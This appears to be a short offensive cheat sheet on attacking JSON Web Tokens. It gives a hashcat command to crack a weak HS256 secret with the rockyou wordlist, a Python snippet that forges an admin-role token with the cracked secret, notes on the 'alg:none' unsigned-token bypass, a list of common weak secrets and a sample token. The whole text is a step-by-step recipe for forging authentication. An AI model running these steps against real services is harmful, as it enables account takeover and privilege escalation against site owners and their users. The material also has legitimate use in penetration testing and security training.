JWT Weak Secret Cracking
JWT ATTACK
# JWT structure: header.payload.signature
# If the HS256 secret is weak, crack it offline
# Step 1: Intercept a JWT token (from Authorization header or cookie)
# Step 2: Decode it (base64url decode each part)
# Step 3: Crack the signature with hashcat:
hashcat -a 0 -m 16500 jwt_token.txt /usr/share/wordlists/rockyou.txt
# Common weak secrets people use:
# secret, password, key, 123456, jwt, token, admin, your-company-name
# Step 4: Re-sign with the cracked secret to forge any payload:
import jwt
token = jwt.encode({"user_id": 1, "role": "admin"}, "secret", algorithm="HS256")
# alg:none bypass (check if server accepts unsigned tokens):
# Header: {"alg":"none","typ":"JWT"}
# Remove the signature part entirely
# Some libraries accept this!
# Sample JWT to decode (secret is "secret"):
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6InJhbSIsInJvbGUiOiJ1c2VyIn0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c